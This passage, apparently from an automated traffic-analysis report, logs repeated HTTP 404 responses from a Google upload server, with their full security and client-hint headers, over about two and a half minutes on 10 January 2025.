'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6uIo5some-btXRcOLd22gMLvc_fEF3ARs7EjTXWqi_iJRU6uxBJH79s0pqNvkWtGR1Iv_7ivYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7A6MlT_rupybLNtKCERIEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC647X2r8U-MTu2n4aPvSdUj3TCScGugC88GXg6g6TgO7vQSPHRs5P0o7lRdkqZFrbGkphzD0tYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dqRnQ96kB8Cx8gWsNVQXJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6arl5y70PQyRDrWNpMytZQSp4tzis-6_R2Kwf-yQJ2dC7eUDn8WCfRwRAe5XX_M7xNYxa-nI4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:33:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3X_gkwWtI59K738p9N7fqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ptTXBTBoCC7JBURVujK9C_kF1AF1JEv7GN8u5sT4ycQ-vETjaPrWByA3vdk1bNm5NwTMDXVcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:00 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qk5CtqYNXSJCBebOjSD41Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4owAQ-rszhPRwGVnM8A0PHGiS_Wsxrq_Fg_ROtqV0ttHRoZRbUHzeLJRoGMtMwRS3wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:11 GMTContent-Security-Policy: script-src 'nonce-gZFSwUHLrUXlEHG4bMp8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56mYfJx7SXF7l10xCPbmiRpR_TcfO8qEGS9TjRAycG4fby3BcR9NAJkDYTbWEOI18yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-M1v3c6y7Ku6SLrIGidpNMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6b4nxUtM48yAR1ZBuO4biwPKd3tdXouRKAbMVj5U55tuVtehXX0n9i9EMGa5n3JYYjCIQYP2sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WfPEWujkleLhr6wVvKm7zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6rviVyHLoy3-nG-CuXrfbQ6P8mnMuGlGZlbHpw-j6LDAFi7V9gZTiMcmzg9jazfgSibDpSIBEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-1oCRabKA1pxrLDpkYjV2mA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC45-i7YH9HgbwTZoFCrGyKRyVgEQlrBnLxE2vDMWXYSEBg3Dsfmtht0qa1UYFa0f-E2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:34:57 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SJ7dBqLYgQFCMsI7lb0qgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7X79WSwMnVC6Dk6SezQM-LvXn1WZhUNpqNpv9HB60POcagnGdD8CIdlMJkzbopNMRYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XuSKyxWzvXdaWTilRNBcJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXtUEJZf4C4gkDCXKnFkydjwwQWKm1nceswqeqLOCI1hznQIp0uNPXdYf66dRviP6W_e-E86AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:22 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-X86PfESf03BrET8MPkZ54A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XBvI73cbfhFTD7NKIHyRefins8Nh-tMwIvGsVOJMNJUm46jRX1TkZlVl8aIjOUN2E_lnlG5oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QtfbGDAh5BauZHnw-osd9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSJS6KD6gxCzrqqBeRy24CousGyYUM_mZdjcRvC4T79YGmFUkvXV5do_CUI5_pjniO7uZ7cyG4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:44 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-0PzhdXXu0uPuUoB_l9032w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7MGSCM-SqO8QIqqKWY3qJxCkHxZcO5bdMP9oMniQH9Cu54DdZ51K_0TXxSih3FWwrqHwnqwTgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:35:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-cf6_GHo-5Pu2mtyymmWuuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
